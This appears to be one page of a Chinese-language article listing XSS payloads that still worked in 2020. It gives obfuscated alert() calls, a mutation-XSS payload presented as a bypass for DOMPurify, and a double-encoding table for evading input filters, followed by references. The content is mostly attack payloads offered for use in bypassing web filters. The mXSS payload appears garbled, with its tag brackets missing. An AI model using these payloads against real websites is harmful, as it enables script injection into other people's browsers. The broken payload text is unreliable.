2020年仍然有效的一些XSS Payload

1、JSFuck
2、JSFsck（不带圆括号的JSFuck）
3、jjencode
关键词过滤
避免使用的关键词：
(alert)(1)
(1,2,3,4,5,6,7,8,alert)(1)
a=alert,a(1)
[1].find(alert)
top["al”+”ert"](1)
top[/al/.source+/ert/.source](1)
al/u0065rt(1)
top['al/145rt'](1)
top['al/x65rt'](1)
top[8680439..toString(30)](1)  // Generated using parseInt(“alert”,30). Other bases also work
mXSS和DOM攻击
对于XSS过滤器来说，它们基本上不可能正确地预测浏览器如何跟HTML以及交互库进行数据处理的方式。因此，有的时候我们就可以将XSS Payload作为无效的HTML插入到目标页面中，然后浏览器将有可能把它作为有效Payload执行，这样就可以绕过过滤器了。
下面给出的是一个能够绕过最常见过滤器（DOMPurify ）的mXSS Payload：
svg>p>style>style>img src=1 onerror=alert(1)>">
    svg>p>style>style>img src=1 onerror=alert(1)>">p>svg>
双重编码
有的时候，应用程序会在字符串再次解码之前，对其执行XSS过滤，这样就会给我们留下实现绕过的可乘之机。
字符
双重编码
%253C
>
%253E
(
%2528
)
%2529
”
%2522
’
%2527
参考资料
1、https://www.vulnerability-lab.com/resources/documents/531.txt
2、https://portswigger.net/web-security/cross-site-scripting/cheat-sheet
3、https://portswigger.net/research/abusing-javascript-frameworks-to-bypass-xss-mitigations
4、https://cure53.de/fp170.pdf
5、https://www.*******.com/watch?v=5W-zGBKvLxk
6、https://xss.pwnfunction.com/
 

上一页  [1] [2] [3] 

 3/4   首页 上一页 1 2 3 4 下一页 尾页